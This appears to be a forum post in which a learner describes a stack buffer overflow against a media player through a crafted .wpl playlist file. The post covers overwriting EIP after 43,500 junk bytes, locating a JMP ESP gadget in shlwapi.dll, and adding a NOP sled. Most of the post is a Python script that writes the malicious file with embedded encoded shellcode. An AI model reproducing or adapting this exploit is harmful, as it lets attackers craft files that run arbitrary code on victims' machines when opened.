ok this is may last time try. I try to exploit using *.wpl extension. and here the result.
1. first picture explain that EIP fill by A character

2. picture describe that I was get fiil the EIP by DEADBEEF. I can get this after fill the stack using 43500 character junk

 3. I use shlwapi to fine the JMP ESP command

4. and here  my script

jnk="\x43" * (43500);

#jnk+="\xEF\xBE\xAD\xDE"

jnk+="\x27\xB2\xFA\x77"

#jnk+="\x41"*16

jnk+="\x90"*32

jnk+=("\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"

"\x20\xd3\x4e\x83\xeb\xfc\xe2\xf4\xc3\xc8\x97\x4e\x3f\x20\x58\x0b"

"\x03\xab\xaf\x4b\x47\x21\x3c\xc5\x70\x38\x58\x11\x1f\x21\x38\x07"

"\xb4\x14\x58\x4f\xd1\x11\x13\xd7\x93\xa4\x13\x3a\x38\xe1\x19\x43"

"\x3e\xe2\x38\xba\x04\x74\xf7\x4a\x4a\xc5\x58\x11\x1b\x21\x38\x28"

"\xb4\x2c\x98\xc5\x60\x3c\xd2\xa5\xb4\x3c\x58\x4f\xd4\xa9\x8f\x6a"

"\x3b\xe3\xe2\x8e\x5b\xab\x93\x7e\xba\xe0\xab\x42\xb4\x60\xdf\xc5"

"\x4f\x3c\x7e\xc5\x57\x28\x38\x47\xb4\xa0\x63\x4e\x3f\x20\x58\x26"

"\x03\x7f\xe2\xb8\x5f\x76\x5a\xb6\xbc\xe0\xa8\x1e\x57\x5e\x0b\xac"

"\x4c\x48\x4b\xb0\xb5\x2e\x84\xb1\xd8\x43\xb2\x22\x5c\x0e\xb6\x36"

"\x5a\x20\xd3\x4e")

ex = jnk

file=open("try.wpl","w")

file.write(ex)

file.close()

#alamat JMP ESP ADA DI 77FAB227 jika di balik menjadi "\x27\xB2\xFA\X77".ketemu di shlwapi.dll